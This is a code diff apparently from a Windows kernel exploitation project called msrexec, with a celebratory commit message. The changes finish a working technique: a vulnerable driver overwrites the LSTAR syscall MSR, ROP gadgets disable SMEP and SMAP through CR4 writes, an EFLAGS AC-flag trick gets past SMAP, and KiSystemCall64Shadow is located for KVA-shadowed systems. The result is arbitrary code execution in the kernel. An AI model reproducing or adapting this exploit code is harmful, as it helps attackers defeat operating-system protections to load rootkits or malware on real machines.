it works!!!!!!! thank you drew!!! :)))

main.cpp

@@ -27,19 +27,22 @@ int __cdecl main(int argc, char** argv)
 	};
 
 	vdm::msrexec_ctx msrexec(_write_msr);
-	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
+	for(auto idx = 0u; idx < 100; ++idx)
 	{
-		const auto dbg_print = 
+		msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
-			reinterpret_cast<dbg_print_t>(
+		{
-				get_kroutine(krnl_base, "DbgPrint"));
+			const auto dbg_print = 
-
+				reinterpret_cast<dbg_print_t>(
-		const auto ex_alloc_pool = 
+					get_kroutine(krnl_base, "DbgPrint"));
-			reinterpret_cast<ex_alloc_pool_t>(
+
-				get_kroutine(krnl_base, "ExAllocatePool"));
+			const auto ex_alloc_pool = 
-
+				reinterpret_cast<ex_alloc_pool_t>(
-		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
+					get_kroutine(krnl_base, "ExAllocatePool"));
-		dbg_print("> cr4 -> 0x%p\n", __readcr4());
+
-	});
+			dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
+			dbg_print("> cr4 -> 0x%p\n", __readcr4());
+		});
+	}
 
 	const auto unload_result =
 		vdm::unload_drv(drv_handle, drv_key);

msrexec.cpp

@@ -22,7 +22,6 @@ namespace vdm
 			if (!find_globals())
 				std::printf("> failed to find globals...\n");
 
-		// this is a guess aided by cpuid feature checks...
 		cpuid_eax_01 cpuid_info;
 		__cpuid((int*)&cpuid_info, 1);
 
@@ -34,31 +33,33 @@ namespace vdm
 		cr4_value.page_size_extensions = true;
 		cr4_value.machine_check_enable = true;
 
-		cr4_value.physical_address_extension = 
+		cr4_value.physical_address_extension =
 			cpuid_info.cpuid_feature_information_edx.physical_address_extension;
 
-		cr4_value.os_fxsave_fxrstor_support = 
+		cr4_value.os_fxsave_fxrstor_support =
 			cpuid_info.cpuid_feature_information_edx.fxsave_fxrstor_instructions;
 
 		cr4_value.os_xmm_exception_support = true;
 
-		cr4_value.fsgsbase_enable = 
+		cr4_value.fsgsbase_enable =
 			IsProcessorFeaturePresent(PF_RDWRFSGSBASE_AVAILABLE);
 
-		cr4_value.os_xsave = 
+		cr4_value.os_xsave =
 			IsProcessorFeaturePresent(PF_XSAVE_ENABLED);
 
-		cr4_value.pcid_enable = 
+		cr4_value.pcid_enable =
 			cpuid_info.cpuid_feature_information_ecx
-			.process_context_identifiers;
+				.process_context_identifiers;
 
 		m_smep_off.flags = cr4_value.flags;
 		m_smep_off.smep_enable = false;
+		m_smep_off.smap_enable = false; // newer spus have this on...
 
 		// WARNING: some virtual machines dont have SMEP...
 		// my VMWare VM doesnt... nor does my Virtual Box VM...
 		m_smep_on.flags = cr4_value.flags;
-		m_smep_on.smap_enable = cpuid_features.ebx.smep;
+		m_smep_on.smep_enable = cpuid_features.ebx.smep;
+		m_smep_on.smap_enable = cpuid_features.ebx.smap;
 
 		ntoskrnl_base = 
 			reinterpret_cast<void*>(
@@ -76,6 +77,9 @@ namespace vdm
 		std::printf("> m_kpcr_krsp_offset -> 0x%x\n", m_kpcr_krsp_offset);
 		std::printf("> m_system_call -> 0x%p\n", m_system_call);
 
+		std::printf("> m_smep_off -> 0x%p\n", m_smep_off.flags);
+		std::printf("> m_smep_on -> 0x%p\n", m_smep_on.flags);
+
 		std::printf("> check to make sure none of these^ are zero before pressing enter...\n");
 		std::getchar();
 	}
@@ -135,6 +139,41 @@ namespace vdm
 
 		m_kpcr_rsp_offset = *reinterpret_cast<std::uint32_t*>(ki_system_call + 8);
 		m_kpcr_krsp_offset = *reinterpret_cast<std::uint32_t*>(ki_system_call + 17);
+
+		// handle KVA shadowing... if KVA shadowing is enabled LSTAR will point at KiSystemCall64Shadow...
+		SYSTEM_KERNEL_VA_SHADOW_INFORMATION kva_info = { 0 };
+
+		// if SystemKernelVaShadowInformation is not a valid class just 
+		// return true and assume LSTAR points to KiSystemCall64...
+		if (NT_SUCCESS(NtQuerySystemInformation(SystemKernelVaShadowInformation, &kva_info, sizeof(kva_info), nullptr)))
+		{
+			if (kva_info.KvaShadowFlags.KvaShadowEnabled)
+			{				
+				const auto [section_data, section_rva] =
+					utils::pe::get_section(
+						reinterpret_cast<std::uintptr_t>(
+							LoadLibraryA("ntoskrnl.exe")), "KVASCODE");
+
+				// no KVASCODE section so there is no way for LSTAR to be KiSystemCall64Shadow...
+				if (!section_rva || section_data.empty())
+					return true;
+
+				const auto ki_system_shadow_call =
+					utils::scan(reinterpret_cast<std::uintptr_t>(
+						section_data.data()), section_data.size(),
+							KI_SYSCALL_SHADOW_SIG, KI_SYSCALL_SHADOW_MASK);
+
+				// already set m_syscall_call so we just return true...
+				if (!ki_system_shadow_call)
+					return true; 
+
+				// else we update m_system_call with KiSystemCall64Shadow...
+				m_system_call = (ki_system_shadow_call -
+					reinterpret_cast<std::uintptr_t>(
+						section_data.data())) + section_rva +
+							utils::kmodule::get_base("ntoskrnl.exe");
+			}
+		}
 		return true;
 	}
 
@@ -146,13 +185,9 @@ namespace vdm
 			GetThreadPriority(GetCurrentThread()) 
 		};
 
-		// make it so our thread is highest possible priority...
 		SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
 		SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
 
-		// we want to finish off our quantum...
-		while (!SwitchToThread());
-
 		// set LSTAR to first rop gadget... race begins here...
 		if (!wrmsr(IA32_LSTAR_MSR, m_pop_rcx_gadget))
 			std::printf("> failed to set LSTAR...\n");
@@ -160,7 +195,6 @@ namespace vdm
 			// go go gadget kernel execution...
 			syscall_wrapper(&kernel_callback);
 
-		// reset thread priority...
 		SetPriorityClass(GetCurrentProcess(), thread_info.first);
 		SetThreadPriority(GetCurrentThread(), thread_info.second);
 	}

msrexec.hpp

@@ -13,6 +13,10 @@
 #define KI_SYSCALL_MASK "xxxxxxxx????xxxxx????xxxxxx????xxx?xxxx"
 static_assert(sizeof KI_SYSCALL_SIG == sizeof KI_SYSCALL_MASK, "signature/mask invalid size...");
 
+#define KI_SYSCALL_SHADOW_SIG "\x0F\x01\xF8\x65\x48\x89\x24\x25\x00\x00\x00\x00\x65\x48\x8B\x24\x25\x00\x00\x00\x00\x65\x0F\xBA\x24\x25\x00\x00\x00\x00\x00\x72\x03\x0F\x22\xDC"
+#define KI_SYSCALL_SHADOW_MASK "xxxxxxxx????xxxxx????xxxxx?????xxxxx"
+static_assert(sizeof KI_SYSCALL_SHADOW_SIG == sizeof KI_SYSCALL_SHADOW_MASK);
+
 using get_system_routine_t = void* (*)(void*, const char*);
 using callback_t = std::function<void(void*, get_system_routine_t)>;
 using thread_info_t = std::pair<std::uint32_t, std::uint32_t>;

msrexec.vcxproj

@@ -75,6 +75,7 @@
       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>true</ConformanceMode>
       <LanguageStandard>stdcpp17</LanguageStandard>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
     </ClCompile>
     <Link>
       <SubSystem>Console</SubSystem>
@@ -91,6 +92,7 @@
       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>true</ConformanceMode>
       <LanguageStandard>stdcpp17</LanguageStandard>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
     </ClCompile>
     <Link>
       <SubSystem>Console</SubSystem>

syscall_handler.asm

@@ -54,6 +54,8 @@ syscall_handler endp
 
 syscall_wrapper proc
 	push r10													; syscall puts RIP into rcx...
+	pushfq
+
 	mov r10, rcx												; swap r10 and rcx...
 	push m_sysret_gadget										; REX.W prefixed...
 
@@ -61,7 +63,6 @@ syscall_wrapper proc
 	push rax													;
 
 	push m_pop_rcx_gadget										; gadget to put RIP back into rcx...
-
 	push m_mov_cr4_gadget										; turn smep back on...
 
 	push m_smep_on												; value of CR4 with smep off...
@@ -73,10 +74,17 @@ syscall_wrapper proc
 	push m_mov_cr4_gadget										; disable smep...
 	push m_smep_off												; 
 
+	pushfq														; THANK YOU DREW YOU SAVED THE PROJECT!!!
+	pop rax														; this will set the AC flag in EFLAGS which "disables SMAP"...
+	or rax, 040000h												;
+	push rax													;
+	popfq														;
+
 	syscall														; LSTAR points at a pop rcx gadget... 
 																; it will put m_smep_off into rcx...
 finish:
-	pop r10
+	popfq														; restore EFLAGS...
+	pop r10														; restore r10...
 	ret
 syscall_wrapper endp
 end

utils.hpp

@@ -39,23 +39,23 @@ typedef struct _RTL_PROCESS_MODULES
 	RTL_PROCESS_MODULE_INFORMATION Modules[1];
 } RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES;
 
-extern "C++"
+#define SystemKernelVaShadowInformation     (SYSTEM_INFORMATION_CLASS) 196
+typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION
 {
-	char _RTL_CONSTANT_STRING_type_check(const WCHAR* s);
+	struct
-	// __typeof would be desirable here instead of sizeof.
+	{
-	template <size_t N> class _RTL_CONSTANT_STRING_remove_const_template_class;
+		ULONG KvaShadowEnabled : 1;
-template <> class _RTL_CONSTANT_STRING_remove_const_template_class<sizeof(char)> { public: typedef  char T; };
+		ULONG KvaShadowUserGlobal : 1;
-template <> class _RTL_CONSTANT_STRING_remove_const_template_class<sizeof(WCHAR)> { public: typedef WCHAR T; };
+		ULONG KvaShadowPcid : 1;
-#define _RTL_CONSTANT_STRING_remove_const_macro(s) \
+		ULONG KvaShadowInvpcid : 1;
-    (const_cast<_RTL_CONSTANT_STRING_remove_const_template_class<sizeof((s)[0])>::T*>(s))
+		ULONG KvaShadowRequired : 1;
-}
+		ULONG KvaShadowRequiredAvailable : 1;
-
+		ULONG InvalidPteBit : 6;
-#define RTL_CONSTANT_STRING(s) \
+		ULONG L1DataCacheFlushSupported : 1;
-{ \
+		ULONG L1TerminalFaultMitigationPresent : 1;
-    sizeof( s ) - sizeof( (s)[0] ), \
+		ULONG Reserved : 18;
-    sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \
+	} KvaShadowFlags;
-    _RTL_CONSTANT_STRING_remove_const_macro(s) \
+} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, * PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;
-}
 
 namespace utils
 {
@@ -310,7 +310,8 @@ namespace utils
 					reinterpret_cast<char*>(
 						section_header[idx].Name);
 
-				if (!strcmp(_section_name, section_name))
+				// sometimes section names are not null terminated...
+				if (!strncmp(_section_name, section_name, strlen(section_name) - 1))
 				{
 					const auto section_base = 
 						reinterpret_cast<std::uint8_t*>(